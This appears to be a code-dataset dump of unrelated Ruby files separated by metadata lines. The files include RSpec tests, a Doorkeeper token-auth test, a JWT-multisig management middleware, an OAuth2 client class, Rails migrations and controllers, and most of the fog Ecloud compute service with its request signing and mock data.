ignored', :quarantine) {} end expect(group.examples.first.execution_result.status).to be_nil end it 'skips quarantined focused tests' do group = describe_successfully do it('is pending', :quarantine, :foo) {} end expect(group.examples.first.execution_result.status).to be(:pending) expect(group.examples.first.execution_result.pending_message) .to eq('In quarantine') end end context 'with :quarantine and non-quarantine tags focused' do before do described_class.configure_rspec RSpec.configure do |c| c.filter_run :foo, :bar, :quarantine end end it 'ignores non-quarantined non-focused tests' do group = describe_successfully do example {} end expect(group.examples.first.execution_result.status).to be_nil end it 'skips non-quarantined focused tests' do group = describe_successfully do it('is pending', :foo) {} end expect(group.examples.first.execution_result.status).to be(:pending) expect(group.examples.first.execution_result.pending_message) .to eq('Only running tests tagged with :quarantine and any of [:bar, :foo]') end it 'skips quarantined non-focused tests' do group = describe_successfully do it('is pending', :quarantine) {} end expect(group.examples.first.execution_result.status).to be(:pending) end it 'executes quarantined focused tests' do group = describe_successfully do it('passes', :quarantine, :foo) {} end expect(group.examples.first.execution_result.status).to be(:passed) end end end end
29.606164
96
0.638172
abae97d32e8b9d025e2faf9f6ca7dc856435d02d
495
Paperclip::Attachment.default_options[:storage] = :qiniu Paperclip::Attachment.default_options[:qiniu_credentials] = { :access_key => ENV['QINIU_ACCESS_KEY'] || raise("set env QINIU_ACCESS_KEY"), :secret_key => ENV['QINIU_SECRET_KEY'] || raise("set env QINIU_SECRET_KEY") } Paperclip::Attachment.default_options[:bucket] = 'paperclip-qiniu-example' Paperclip::Attachment.default_options[:use_timestamp] = false Paperclip::Attachment.default_options[:qiniu_host] = 'http://cdn.example.com'
49.5
78
0.773737
1d49a16f3a6925df13c5f5618d5026a5299ce109
423
class CreateUserLessonTests < ActiveRecord::Migration[5.0] def change create_table :user_lesson_tests do |t| t.integer :user_id, null: false t.integer :lesson_id, null: false t.string :right_percent, null: false t.timestamps end add_index :user_lesson_tests, :user_id add_index :user_lesson_tests, [:user_id, :lesson_id], unique: true, name: 'index_on_user_lesson_tests' end end
32.538462
106
0.718676
f7330529d497ed949421192b1ac346adc9823479
3,281
module SparkApi module Authentication module OAuth2Impl class GrantTypeBase GRANT_TYPES = [:authorization_code, :password, :refresh_token] def self.create(client, provider, session=nil) granter = nil case provider.grant_type when :authorization_code granter = GrantTypeCode.new(client, provider, session) when :password granter = GrantTypePassword.new(client, provider, session) # This method should only be used internally to the library when :refresh_token granter = GrantTypeRefresh.new(client, provider, session) else raise ClientError, "Unsupported grant type [#{provider.grant_type}]" end SparkApi.logger.debug { "[oauth2] setup #{granter.class.name}" } granter end attr_reader :provider, :client, :session def initialize(client, provider, session) @client = client @provider = provider @session = session end def authenticate end def refresh end protected def create_session(token_params) SparkApi.logger.debug { "[oauth2] create_session to #{provider.access_uri} params #{token_params}" } uri = URI.parse(provider.access_uri) request_path = "#{uri.path}" response = oauth_access_connection("#{uri.scheme}://#{uri.host}").post(request_path, "#{token_params}").body response.expires_in = provider.session_timeout if response.expires_in.nil? SparkApi.logger.debug { "[oauth2] New session created #{response}" } response rescue Faraday::ConnectionFailed => e if @client.ssl_verify && e.message =~ /certificate verify failed/ SparkApi.logger.error { SparkApi::Errors.ssl_verification_error } end raise e end def needs_refreshing? [email protected]? && [email protected]_token.nil? && @session.expired? end # Generate the appropriate request uri for authorizing this application for current user. def authorization_url() params = { "client_id" => @provider.client_id, "response_type" => "code", "redirect_uri" => @provider.redirect_uri } "#{@provider.authorization_uri}?#{build_url_parameters(params)}" end # Setup a faraday connection for dealing with an OAuth2 endpoint def oauth_access_connection(endpoint) opts = { :headers => @client.headers } opts[:ssl] = {:verify => false } unless @client.ssl_verify opts[:url] = endpoint conn = Faraday::Connection.new(opts) do |conn| conn.response :oauth2_impl conn.adapter Faraday.default_adapter end end def build_url_parameters(parameters={}) array = parameters.map do |key,value| escaped_value = CGI.escape("#{value}") "#{key}=#{escaped_value}" end array.join "&" end end end end end
34.904255
118
0.574825
18c0c09113ff19d9fa53f902a4d267891f648540
616
class ProductsController < ApplicationController def index products = Product.all render json: products end def add_frame links = Product.new.add_frame(params[:publicId], params[:size], params[:orientation]) render json: { link: links } end def add_print links = Product.new.add_print(params[:publicId], params[:size], params[:orientation]) render json: { link: links } end def add_canvas links = Product.new.add_canvas(params[:publicId], params[:size], params[:orientation]) render json: { link: links } end end
23.692308
94
0.637987
edaa8053553992082a07d59d79520b5f919c3a41
3,716
# frozen_string_literal: true require_relative '../../../test_helper' SingleCov.covered! # needs Integration at the end for minitest-spec-rails describe 'Warden::Strategies::DoorkeeperStrategy Integration' do def perform_get(authorization) get path, headers: {HTTP_AUTHORIZATION: authorization} end def error JSON.parse(response.body).fetch("error") end let(:path) { +"/deploys/active_count.json" } let!(:user) { users(:admin) } let(:token) { Doorkeeper::AccessToken.create!(resource_owner_id: user.id, scopes: 'deploys') } let!(:valid_header) { "Bearer #{token.token}" } it "logs the user in" do perform_get valid_header assert_response :success, response.body end it "does not set a session since oauth requests are not supposed to log in a browser" do perform_get valid_header response.headers['Set-Cookie'].must_be_nil end it "does not check and fails without header" do assert_sql_queries(0) { perform_get nil } error.must_equal "You are not logged in, see docs/api.md on how to authenticate" assert_response :unauthorized end it "checks and fails with invalid header" do assert_sql_queries(1) { perform_get(valid_header + Base64.encode64('foo')) } error.must_equal "Bearer token is invalid" assert_response :unauthorized end it "checks and fails with unfound user" do user.delete assert_sql_queries(3) { perform_get(valid_header) } # FYI queries are: find token, revoke token, find user error.must_equal "Bearer token belongs to deleted user #{user.id}" assert_response :unauthorized end it "checks and fails with missing scope access" do token.update_column(:scopes, 'foobar') assert_sql_queries(2) { perform_get(valid_header) } # FYI queries are: find token, revoke token error.must_equal "Bearer token needs scope default or deploys" assert_response :unauthorized end describe "when accessing web-ui" do let(:path) { "/profile" } it "checks and fails when using restricted token" do perform_get(valid_header) error.must_equal "Bearer token needs scope default or profiles" assert_response :unauthorized end it "logs the user in when using efault token" do token.update_column(:scopes, "default") perform_get(valid_header) assert_response :success, response.body end it "logs the user in when using controller specific token" do token.update_column(:scopes, "profiles") perform_get(valid_header) assert_response :success, response.body end end it "checks and fails with expired token" do token.update(expires_in: 1, created_at: 1.day.ago) assert_sql_queries(2) { perform_get(valid_header) } # FYI queries are: find token, revoke token error.must_equal "Bearer token is expired" assert_response :unauthorized end it "does not check and fails with non matching header" do assert_sql_queries(0) { perform_get "oops" + valid_header } error.must_equal "You are not logged in, see docs/api.md on how to authenticate" assert_response :unauthorized end describe "last_used_at" do it "tracks when previously unset" do perform_get valid_header token.reload.last_used_at.must_be :>, 2.seconds.ago end it "does not update when recent to avoid db overhead" do old = 10.seconds.ago token.update_column(:last_used_at, old) perform_get valid_header token.reload.last_used_at.to_s.must_equal old.to_s end it "updates when old" do old = 1.hour.ago token.update_column(:last_used_at, old) perform_get valid_header token.reload.last_used_at.must_be :>, 2.seconds.ago end end end
32.884956
110
0.718784
bb241dc15dbaf7077ebc6bcdf32a2759720d9ad6
526
class CreateSubscriptionCountries < ActiveRecord::Migration def self.up create_table :subscription_countries do |t| t.integer :subscription_id, :null => false t.integer :country_id, :null => false t.decimal :price, :null => false, :default => 0 t.decimal :price_over_threshold, :null => false, :default => 0 t.timestamps end add_index :subscription_countries, [:subscription_id, :country_id], :unique => true end def self.down drop_table :subscription_countries end end
29.222222
87
0.693916
f833ab238cadfe4af6b2a06763290b43eed7f84c
1,803
class LwtAuthenticationSystemGenerator < Rails::Generator::Base #TODO: update classes of they exists? #TODO: Add routes? #TODO: Add tests def manifest record do |m| m.directory File.join( *%w{ app controllers } ) m.directory File.join( *%w{ app models } ) m.directory File.join( *%w{ app views user_reminder_mailer } ) m.directory File.join( *%w{ app views users } ) m.directory File.join( *%w{ spec fixtures } ) m.directory File.join( *%w{ db migrate } ) m.template 'app/controllers/login_controller.rb', File.join( *%w{ app controllers users_controller.rb } ) m.template 'app/models/model.rb', File.join( *%w{ app models user.rb } ) m.template 'app/views/user_reminder_mailer/reminder.html.erb', File.join( *%W{ app views user_reminder_mailer reminder.html.erb } ) m.template 'app/views/users/login.html.erb', File.join( *%W{ app views users login.html.erb } ) m.template 'app/views/users/profile.html.erb', File.join( *%W{ app views users profile.html.erb } ) m.template 'app/views/users/reminder.html.erb', File.join( *%W{ app views users reminder.html.erb } ) m.template 'app/views/users/signup.html.erb', File.join( *%W{ app views users signup.html.erb } ) m.template 'spec/fixtures/groups.yml', File.join( *%w{ spec fixtures groups.yml } ) m.template 'spec/fixtures/groups_privileges.yml', File.join( *%w{ spec fixtures groups_privileges.yml } ) m.template 'spec/fixtures/privileges.yml', File.join( *%w{ spec fixtures privileges.yml } ) m.template 'spec/fixtures/users.yml', File.join( *%w{ spec fixtures users.yml } ) m.migration_template 'db/migrate/migration.rb', File.join( *%w{ db migrate } ), :migration_file_name => "add_lwt_authentication_system" end end end
60.1
141
0.681642
611a3e6e34593754cc05492742ac86e43d9e4a88
540
cask 'simply-fortran' do version '3.6.3116' sha256 '9c3a9d94f76fdc55d724ed3f87e4798508665cddb730aeaf496b0c3b98bf6b65' # download.approximatrix.com/simplyfortran was verified as official when first introduced to the cask url "http://download.approximatrix.com/simplyfortran/#{version.major_minor}/simplyfortran-#{version}.dmg" appcast 'https://simplyfortran.com/download/?platform=macos', configuration: version.major_minor name 'Simply Fortran' homepage 'https://simplyfortran.com/' app 'Simply Fortran.app' end
38.571429
107
0.77963
5d23037464318a349e316626d675c643e0c76402
1,082
# frozen_string_literal: true require 'elastic_apm/span_helpers' module ElasticAPM RSpec.describe SpanHelpers do class Thing include ElasticAPM::SpanHelpers def do_the_thing 'ok' end span_method :do_the_thing def self.do_all_things 'all ok' end span_class_method :do_all_things end context 'on class methods', :intercept do it 'wraps in a span' do ElasticAPM.start ElasticAPM.with_transaction do Thing.do_all_things end ElasticAPM.stop expect(@intercepted.spans.length).to be 1 expect(@intercepted.spans.last.name).to eq 'do_all_things' end end context 'on instance methods', :intercept do it 'wraps in a span' do thing = Thing.new ElasticAPM.start ElasticAPM.with_transaction do thing.do_the_thing end ElasticAPM.stop expect(@intercepted.spans.length).to be 1 expect(@intercepted.spans.last.name).to eq 'do_the_thing' end end end end
20.037037
66
0.631238
ab6d8d3774f5aec6ca365f6710d902ad01413cf7
2,382
require 'rails_helper' describe 'assignments/new.html.slim', type: :view do let(:unassigned_case) { create :case } let(:bg) { create :business_group } let(:dir) { create :directorate, business_group: bg } let!(:business_unit_1) { create :responding_team, directorate: dir } let!(:business_unit_2) { create :responding_team, directorate: dir } let!(:business_unit_3) { create :responding_team, directorate: dir } it 'displays the new assignment page for a new case' do assign(:case, unassigned_case) assign(:assignment, unassigned_case.assignments.new) flash[:notice] = true assign(:creating_case, true) render assignments_new_page.load(rendered) page = assignments_new_page expect(page.page_heading.heading.text).to eq "Assign case" expect(page.page_heading.sub_heading.text) .to eq "Create case " expect(page.business_groups).to have_group expect(page.business_groups).to have_all_groups expect(page).to have_no_assign_to end context 'User has selected a specific business group or viewing all' do it 'displays the new assignment page with business units' do assign(:case, unassigned_case) assign(:assignment, unassigned_case.assignments.new) flash[:notice] = true assign(:creating_case, true) assign(:business_units, dir.business_units) render assignments_new_page.load(rendered) page = assignments_new_page expect(page.page_heading.heading.text).to eq "Assign case" expect(page.page_heading.sub_heading.text) .to eq "Create case " expect(page.business_groups).to have_group expect(page.business_groups).to have_all_groups expect(page.assign_to.team.count).to eq 3 dir.business_units.each do | bu | page_team = page.assign_to.team.detect { |team| team.business_unit.text == bu.name } expect(page_team.areas_covered.map(&:text)) .to match_array bu.areas.map(&:value) expect(page_team.deputy_director.text).to eq bu.team_lead expect(page_team.assign_link.text).to eq "Assign to this unit" expect(page_team.assign_link[:href]) .to eq assign_to_responder_team_case_assignments_path( unassigned_case, team_id: bu.id ) end end end end
30.935065
92
0.68178
33549a4946ceecba58dd4a5a3e6190de4b0cdb5c
1,814
module Spec module Mocks class Mock include Methods # Creates a new mock with a +name+ (that will be used in error messages # only) == Options: # * <tt>:null_object</tt> - if true, the mock object acts as a forgiving # null object allowing any message to be sent to it. def initialize(name, stubs_and_options={}) @name = name @options = parse_options(stubs_and_options) assign_stubs(stubs_and_options) end # This allows for comparing the mock to other objects that proxy such as # ActiveRecords belongs_to proxy objects By making the other object run # the comparison, we're sure the call gets delegated to the proxy target # This is an unfortunate side effect from ActiveRecord, but this should # be safe unless the RHS redefines == in a nonsensical manner def ==(other) other == __mock_proxy end def method_missing(sym, *args, &block) __mock_proxy.instance_eval {@messages_received << [sym, args, block]} begin return self if __mock_proxy.null_object? super(sym, *args, &block) rescue NameError __mock_proxy.raise_unexpected_message_error sym, *args end end def inspect "#<#{self.class}:#{sprintf '0x%x', self.object_id} @name=#{@name.inspect}>" end def to_s inspect.gsub('<','[').gsub('>',']') end private def parse_options(options) options.has_key?(:null_object) ? {:null_object => options.delete(:null_object)} : {} end def assign_stubs(stubs) stubs.each_pair do |message, response| stub!(message).and_return(response) end end end end end
31.824561
94
0.606395
21d4be7bfb947a12cbdecc70c3b7eb0c82c1c503
392
require "chef/config" require_relative "with_pattern" module Cheffish class ChefRunData def initialize(config) @local_servers = [] @current_chef_server = Cheffish.default_chef_server(config) end extend Cheffish::WithPattern with :data_bag with :environment with :data_bag_item_encryption with :chef_server attr_reader :local_servers end end
19.6
65
0.732143
1d36ff12892261cbc7e08c11f596c86a2d249312
2,713
# frozen_string_literal: true require 'stringio' module API::V2 module Management class JWTAuthenticationMiddleware < Grape::Middleware::Base extend Memoist mattr_accessor :security_configuration def before return if request.path == '/api/v2/management/swagger' check_request_method! check_query_parameters! check_content_type! payload = check_jwt!(jwt) env['rack.input'] = StringIO.new(payload.fetch(:data, {}).to_json) end private def request Grape::Request.new(env) end memoize :request def jwt JSON.parse(request.body.read) rescue StandardError => e raise Exceptions::Authentication, \ message: 'Couldn\'t parse JWT.', debug_message: e.inspect, status: 400 end memoize :jwt def check_request_method! return if request.post? || request.put? raise Exceptions::Authentication, \ message: 'Only POST and PUT verbs are allowed.', status: 405 end def check_query_parameters! return if request.GET.empty? raise Exceptions::Authentication, \ message: 'Query parameters are not allowed.', status: 400 end def check_content_type! return if request.content_type == 'application/json' raise Exceptions::Authentication, \ message: 'Only JSON body is accepted.', status: 400 end def check_jwt!(jwt) begin scope = security_configuration.fetch(:scopes).fetch(security_scope) keychain = security_configuration .fetch(:keychain) .slice(*scope.fetch(:permitted_signers)) .each_with_object({}) { |(k, v), memo| memo[k] = v.fetch(:value) } result = JWT::Multisig.verify_jwt(jwt, keychain, security_configuration.fetch(:jwt, {})) rescue StandardError => e Rails.logger.error "ManagementAPI check_jwt error: #{e.inspect}" raise Exceptions::Authentication, \ message: 'Failed to verify JWT.', debug_message: e.inspect, status: 401 end unless (scope.fetch(:mandatory_signers) - result[:verified]).empty? raise Exceptions::Authentication, \ message: 'Not enough signatures for the action.', status: 401 end result[:payload] end def security_scope request.env['api.endpoint'].options.fetch(:route_options).fetch(:scope) end end end end
28.861702
100
0.58017
bff4b8018df53eff06f3a1dee45197e64a98179d
978
# threes mode puzzles class GameModes::ThreeController < ApplicationController def index render "game_modes/three" end # json endpoint for fetching puzzles on initial pageload def puzzles render json: { # This uses the same puzzle pool as Haste mode puzzles: HastePuzzle.random_level(100).as_json(lichess_puzzle_id: true) } end # player has completed a three round def complete score = completed_three_round_params[:score].to_i if user_signed_in? if score > 0 current_user.completed_three_rounds.create!(score: score) end best = current_user.best_three_score(Date.today) else best = score end render json: { score: score, best: best, high_scores: CompletedThreeRound.high_scores(24.hours.ago).map do |user, score| [user.username, score] end } end private def completed_three_round_params params.require(:three).permit(:score) end end
22.744186
85
0.686094
39ea9118adbb3fd7713eeb9d6621206b635e1c82
996
# # Copyright 2019 ThoughtWorks, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # module Admin module PipelinesHelper include JavaImports def default_stage_config job_configs = JobConfigs.new([JobConfig.new(CaseInsensitiveString.new("defaultJob"), ResourceConfigs.new, ArtifactConfigs.new, com.thoughtworks.go.config.Tasks.new([AntTask.new].to_java(Task)))].to_java(JobConfig)) StageConfig.new(CaseInsensitiveString.new("defaultStage"), job_configs) end end end
36.888889
220
0.764056
62cc2b3663fbf0e3fa3368a816c7c62278b0dadf
37,997
require File.expand_path("../ecloud/models/model", __FILE__) require File.expand_path("../ecloud/models/collection", __FILE__) require File.expand_path("../ecloud/errors", __FILE__) module Fog module Compute class Ecloud < Fog::Service API_URL = "https://services.enterprisecloud.terremark.com" attr_reader :authentication_method, :version #### Credentials # requires recognizes :ecloud_username, :ecloud_password, :ecloud_version, :ecloud_access_key, :ecloud_private_key, :ecloud_authentication_method, :base_path #### Models model_path "fog/compute/ecloud/models/" model :organization collection :organizations model :location collection :locations model :catalog_item collection :catalog model :catalog_configuration collection :catalog_configurations model :environment collection :environments model :task collection :tasks model :compute_pool collection :compute_pools model :server collection :servers model :virtual_machine_assigned_ip collection :virtual_machine_assigned_ips model :hardware_configuration collection :hardware_configurations model :server_configuration_option collection :server_configuration_options model :guest_process collection :guest_processes model :layout collection :layouts model :row collection :rows model :group collection :groups model :internet_service collection :internet_services model :node collection :nodes model :monitor collection :monitors model :cpu_usage_detail collection :cpu_usage_detail_summary model :memory_usage_detail collection :memory_usage_detail_summary model :storage_usage_detail collection :storage_usage_detail_summary model :operating_system_family collection :operating_system_families model :operating_system collection :operating_systems model :template collection :templates model :firewall_acl collection :firewall_acls model :network collection :networks model :ip_address collection :ip_addresses model :physical_device collection :physical_devices model :public_ip collection :public_ips model :trusted_network_group collection :trusted_network_groups model :backup_internet_service collection :backup_internet_services model :rnat collection :rnats model :association collection :associations model :tag collection :tags model :admin_organization collection :admin_organizations model :ssh_key collection :ssh_keys model :password_complexity_rule collection :password_complexity_rules model :authentication_level collection :authentication_levels model :login_banner collection :login_banners model :user collection :users model :role collection :roles model :ssh_key collection :ssh_keys model :support_ticket collection :support_tickets model :detached_disk collection :detached_disks #### Requests request_path "fog/compute/ecloud/requests/" request :backup_internet_service_create request :backup_internet_service_delete request :backup_internet_service_edit request :compute_pool_edit request :firewall_acls_create request :firewall_acls_delete request :get_admin_organization request :get_api_key request :get_api_keys request :get_association request :get_associations request :get_authentication_level request :get_authentication_levels request :get_backup_internet_service request :get_backup_internet_services request :get_catalog request :get_catalog_configuration request :get_catalog_configurations request :get_catalog_item request :get_compute_pool request :get_compute_pools request :get_cpu_usage_detail request :get_cpu_usage_detail_summary request :get_environment request :get_firewall_acl request :get_firewall_acls request :get_group request :get_groups request :get_guest_process request :get_guest_processes request :get_hardware_configuration request :get_internet_service request :get_internet_services request :get_ip_address request :get_layout request :get_layouts request :get_location request :get_locations request :get_login_banner request :get_login_banners request :get_memory_usage_detail request :get_memory_usage_detail_summary request :get_monitor request :get_monitors request :get_network request :get_network_summary request :get_networks request :get_node request :get_nodes request :get_operating_system request :get_operating_system_families request :get_organization request :get_organizations request :get_password_complexity_rule request :get_password_complexity_rules request :get_physical_device request :get_physical_devices request :get_public_ip request :get_public_ips request :get_rnat request :get_rnats request :get_role request :get_roles request :get_row request :get_rows request :get_server request :get_server_configuration_option request :get_server_configuration_options request :get_servers request :get_ssh_key request :get_ssh_keys request :get_storage_usage_detail request :get_storage_usage_detail_summary request :get_support_ticket request :get_support_tickets request :get_tag request :get_tags request :get_task request :get_tasks request :get_template request :get_templates request :get_trusted_network_group request :get_trusted_network_groups request :get_user request :get_users request :get_virtual_machine_assigned_ips request :get_detached_disks request :get_detached_disk request :groups_create request :groups_delete request :groups_edit request :groups_movedown request :groups_moveup request :internet_service_create request :internet_service_delete request :internet_service_edit request :monitors_create_default request :monitors_create_ecv request :monitors_create_http request :monitors_create_loopback request :monitors_create_ping request :monitors_disable request :monitors_edit_ecv request :monitors_edit_http request :monitors_edit_ping request :monitors_enable request :node_service_create request :node_service_delete request :node_service_edit request :power_off request :power_on request :power_reset request :power_shutdown request :public_ip_activate request :rnat_associations_create_device request :rnat_associations_delete request :rnat_associations_edit_network request :rows_create request :rows_delete request :rows_edit request :rows_movedown request :rows_moveup request :ssh_key_create request :ssh_key_delete request :ssh_key_edit request :trusted_network_groups_create request :trusted_network_groups_delete request :trusted_network_groups_edit request :virtual_machine_edit_assigned_ips request :virtual_machine_copy request :virtual_machine_copy_identical request :virtual_machine_create_from_template request :virtual_machine_delete request :virtual_machine_edit request :virtual_machine_edit_hardware_configuration request :virtual_machine_import request :virtual_machine_upload_file request :virtual_machine_detach_disk request :virtual_machine_attach_disk module Shared attr_accessor :base_path attr_reader :versions_uri def validate_data(required_opts = [], options = {}) unless required_opts.all? { |opt| options.key?(opt) } raise ArgumentError.new("Required data missing: #{(required_opts - options.keys).map(&:inspect).join(', ')}") end end def id_from_uri(uri) uri.match(/(\d+)$/)[1].to_i end def default_organization_uri "#{@base_path}/organizations" end end class Real include Shared include Errors class Fog::Compute::Ecloud::ServiceError < Fog::Ecloud::Errors::ServiceError; end class << self def basic_request(name, expects = [200], method = :get, headers = {}, body = "") define_method(name) do |uri| request( :expects => expects, :method => method, :headers => headers, :body => body, :parse => true, :uri => uri ) end end end def initialize(options = {}) @base_path = options[:base_path] || "/cloudapi/ecloud" @connections = {} @connection_options = options[:connection_options] || {} @host = options[:ecloud_host] || API_URL @persistent = options[:persistent] || false @version = options[:ecloud_version] || "2015-05-01" @authentication_method = options[:ecloud_authentication_method] || :cloud_api_auth @access_key = options[:ecloud_access_key] @private_key = options[:ecloud_private_key] if @private_key.nil? || @authentication_method == :basic_auth @authentication_method = :basic_auth @username = options[:ecloud_username] @password = options[:ecloud_password] if @username.nil? || @password.nil? raise ArgumentError, "No credentials (cloud auth, or basic auth) passed!" end else if @access_key.nil? raise ArgumentError, "Incomplete cloud auth credentials supplied!" end @private_key = @private_key.to_s @access_key = @access_key.to_s @hmac = Fog::HMAC.new("sha256", @private_key) end end def request(params) # Convert the uri to a URI if it's a string. if params[:uri].is_a?(String) params[:uri] = URI.parse(@host + params[:uri]) end host_url = "#{params[:uri].scheme}://#{params[:uri].host}#{params[:uri].port ? ":#{params[:uri].port}" : ''}" # Hash connections on the host_url ... There"s nothing to say we won"t get URI"s that go to # different hosts. @connections[host_url] ||= Fog::XML::Connection.new(host_url, @persistent, @connection_options) # Set headers to an empty hash if none are set. headers = set_extra_headers_for(params) || set_extra_headers_for({}) # Make the request options = { :expects => (params[:expects] || 200), :method => params[:method] || "GET", :path => params[:uri].path + "#{"?#{params[:uri].query}" if params[:uri].query}", :headers => headers } unless params[:body].nil? || params[:body].empty? options.merge!(:body => params[:body]) end begin response = @connections[host_url].request(options) rescue Excon::Errors::Error => error raise ServiceError.slurp(error) end # Parse the response body into a hash unless response.body.empty? if params[:parse] document = Fog::ToHashDocument.new parser = Nokogiri::XML::SAX::PushParser.new(document) parser << response.body parser.finish response.body = document.body end end response end private # if Authorization and x-tmrk-authorization are used, the x-tmrk-authorization takes precendence. def set_extra_headers_for(params) length_required = ["PUT", "POST", "DELETE"] params[:headers] = { "x-tmrk-version" => @version, "Date" => Time.now.utc.strftime("%a, %d %b %Y %H:%M:%S GMT"), }.merge(params[:headers] || {}) if length_required.include?(params[:method]) && !params[:headers]["Content-Length"] body_size = 0 if params[:body] body_size = params[:body].size end params[:headers].merge!("Content-Length" => body_size) end if params[:method] == "POST" || params[:method] == "PUT" params[:headers].merge!("Content-Type" => "application/xml") unless params[:headers]["Content-Type"] params[:headers].merge!("Accept" => "application/xml") end unless params[:body].nil? || params[:body].empty? params[:headers].merge!("x-tmrk-contenthash" => "Sha256 #{Base64.encode64(Digest::SHA2.digest(params[:body].to_s)).chomp}") end if @authentication_method == :basic_auth params[:headers].merge!("Authorization" => "Basic #{Base64.encode64(@username + ":" + @password).delete("\r\n")}") elsif @authentication_method == :cloud_api_auth signature = cloud_api_signature(params) params[:headers].merge!( "x-tmrk-authorization" => %{CloudApi AccessKey="#{@access_key}" SignatureType="HmacSha256" Signature="#{signature}"}, "Authorization" => %{CloudApi AccessKey="#{@access_key}" SignatureType="HmacSha256" Signature="#{signature}"} ) end params[:headers] end def cloud_api_signature(params) verb = params[:method].to_s.upcase headers = params[:headers] path = params[:uri].path + "#{"?#{params[:uri].query}" if params[:uri].query}" canonicalized_headers = canonicalize_headers(headers) canonicalized_resource = canonicalize_resource(path) string = [ verb, headers["Content-Length"].to_s, headers["Content-Type"].to_s, headers["Date"].to_s, canonicalized_headers, canonicalized_resource + "\n" ].join("\n") Base64.encode64(@hmac.sign(string)).chomp end # section 5.6.3.2 in the ~1000 page pdf spec def canonicalize_headers(headers) tmp = headers.inject({}) do |ret, h| ret[h.first.downcase] = h.last if h.first.match(/^x-tmrk/i) ret end tmp.reject! { |k, _v| k == "x-tmrk-authorization" } tmp = tmp.sort.map { |e| "#{e.first}:#{e.last}" }.join("\n") tmp end # section 5.6.3.3 in the ~1000 page pdf spec def canonicalize_resource(path) uri, query_string = path.split("?") return uri.downcase if query_string.nil? query_string_pairs = query_string.split("&").sort.map { |e| e.split("=") } tm_query_string = query_string_pairs.map { |x| "#{x.first.downcase}:#{x.last.downcase}" }.join("\n") "#{uri.downcase}\n#{tm_query_string}" end end class Mock include Shared include Errors class Fog::Compute::Ecloud::ServiceError < Fog::Ecloud::Errors::ServiceError; end def self.data @data ||= Hash.new do |hash, key| hash[key] = begin compute_pool_id = Fog.credentials[:ecloud_compute_pool_id] || Fog::Mock.random_numbers(3).to_i environment_id = Fog.credentials[:ecloud_environment_id] || Fog::Mock.random_numbers(3).to_i public_ip_id = Fog.credentials[:ecloud_public_ip_id] || Fog::Mock.random_numbers(6).to_i internet_service_id = Fog::Mock.random_numbers(6).to_i node_service_id = Fog::Mock.random_numbers(6).to_i environment_name = Fog.credentials[:ecloud_environment_name] || Fog::Mock.random_letters(12) location_id = Fog::Mock.random_numbers(4).to_i network_id = Fog.credentials[:ecloud_network_id] || Fog::Mock.random_numbers(6).to_i network_ip = Fog::Ecloud.ip_address public_ip = Fog.credentials[:ecloud_public_ip_name] || Fog::Ecloud.ip_address ip_address_id = Fog::Ecloud.ip_address ip_address2_id = Fog::Ecloud.ip_address operating_system_id = Fog::Mock.random_numbers(7).to_i operating_system_family_id = Fog::Mock.random_numbers(7).to_i organization_id = Fog::Mock.random_numbers(7).to_i organization_name = Fog::Mock.random_letters(7) template_id = Fog.credentials[:ecloud_template_id] || Fog::Mock.random_numbers(7).to_i ssh_key_id = Fog.credentials[:ecloud_ssh_key_id] || Fog::Mock.random_numbers(4).to_i ssh_key_name = Fog.credentials[:ecloud_ssh_key_name] || "root" environment = { :id => environment_id, :href => "/cloudapi/ecloud/environments/#{environment_id}", :name => environment_name, :type => "application/vnd.tmrk.cloud.environment" } organization = { :href => "/cloudapi/ecloud/organizations/#{organization_id}", :type => "application/vnd.tmrk.cloud.organization", :name => organization_name, :Links => { :Link => [ Fog::Ecloud.keep(environment, :href, :name, :type), { :href => "/cloudapi/ecloud/admin/organizations/#{organization_id}", :name => organization_name, :type => "application/vnd.tmrk.cloud.admin.organization", :rel => "alternate", }, { :href => "/cloudapi/ecloud/devicetags/organizations/#{organization_id}", :type => "application/vnd.tmrk.cloud.deviceTag; type=collection", :rel => "down", }, { :href => "/cloudapi/ecloud/alerts/organizations/#{organization_id}", :type => "application/vnd.tmrk.cloud.alertLog", :rel => "down", }, ], }, :Locations => { :Location => [ { :href => "/cloudapi/ecloud/locations/#{location_id}", :name => organization_name, :Catalog => { :href => "/cloudapi/ecloud/admin/catalog/organizations/#{organization_id}/locations/#{location_id}", :type => "application/vnd.tmrk.cloud.admin.catalogEntry; type=collection" }, :Environments => { :Environment => [environment] } } ] } } environment.merge!( :Links => { :Link => [Fog::Ecloud.keep(organization, :href, :name, :type)] } ) admin_organization = { :id => organization_id, :href => "/cloudapi/ecloud/admin/organizations/#{organization_id}", :type => "application/vnd.tmrk.cloud.admin.organization", :name => organization_name, :Links => { :Link => [ Fog::Ecloud.keep(organization, :href, :type, :name) ], }, :organization_id => organization_id, } compute_pool = { :id => compute_pool_id, :href => "/cloudapi/ecloud/computepools/#{compute_pool_id}", :name => Fog::Mock.random_letters(12), :type => "application/vnd.tmrk.cloud.computePool", :environment_id => environment_id, :Links => { :Link => [ Fog::Ecloud.keep(organization, :href, :name, :type), Fog::Ecloud.keep(environment, :href, :name, :type), ] } } public_ip = { :id => public_ip_id, :href => "/cloudapi/ecloud/publicips/#{public_ip_id}", :name => public_ip, :type => "application/vnd.tmrk.cloud.publicIp", :IpType => "none", :environment_id => environment_id, :Links => { :Link => [ Fog::Ecloud.keep(environment, :href, :name, :type), ], }, :InternetServices => { :InternetService => [ ], }, } internet_service = { :id => internet_service_id, :href => "/cloudapi/ecloud/internetservices/#{internet_service_id}", :name => Fog::Mock.random_letters(6), :type => "application/vnd.tmrk.cloud.internetService", :public_ip_id => public_ip_id, :Links => { :Link => [ Fog::Ecloud.keep(public_ip, :href, :name, :type), ], }, :NodeServices => { :NodeService => [ ] }, } node_service = { :id => node_service_id, :href => "/cloudapi/ecloud/nodeservices/#{node_service_id}", :name => Fog::Mock.random_letters(6), :type => "application/vnd.tmrk.cloud.nodeService", :internet_service_id => internet_service_id, :Links => { :Link => [ Fog::Ecloud.keep(internet_service, :href, :name, :type) ], }, } internet_service[:NodeServices][:NodeService].push(node_service) public_ip[:InternetServices][:InternetService].push(internet_service) network = { :id => network_id, :href => "/cloudapi/ecloud/networks/#{network_id}", :name => "#{network_ip}/#{Fog::Mock.random_numbers(2)}", :type => "application/vnd.tmrk.cloud.network", :Address => network_ip, 